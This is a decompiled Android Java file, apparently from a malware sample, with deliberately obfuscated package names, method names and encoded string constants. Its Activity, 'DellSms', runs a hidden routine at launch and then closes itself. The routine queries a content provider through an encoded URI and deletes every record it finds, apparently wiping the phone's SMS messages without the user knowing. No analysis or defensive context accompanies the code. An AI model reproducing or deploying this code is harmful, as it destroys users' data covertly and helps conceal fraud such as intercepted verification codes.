package perion.app.sebgdferxdsfet.ghhsfer;

import android.app.Activity;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import perion.app.sebgdferxdsfet.ghhsfer.Socks.sdfsdfsdfsdf;

public class DellSms extends Activity {
    private /* synthetic */ void fsafsdfsfsdfsfsdfsd() {
        try {
            Cursor query = getContentResolver().query(Uri.parse(serfwefewfwefewef.fsafsdfsfsdfsfsdfsd("1N<U7O&\u001b}\u000e!L!")), null, null, null, null);
            while (query.moveToNext()) {
                getContentResolver().delete(Uri.parse(new StringBuilder().insert(0, sdfsdfsdfsdf.fsafsdfsfsdfsfsdfsd("?\u001e2\u00059\u001f(Ks^/\u001c/^?\u001e2\u00079\u0003/\u0010(\u00183\u001f/^")).append(query.getLong(1)).toString()), null, null);
            }
        } catch (Exception e) {
            Log.e(serfwefewfwefewef.fsafsdfsfsdfsfsdfsd("\u0017S N "), "");
        }
    }

    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        fsafsdfsfsdfsfsdfsd();
        finish();
    }
}
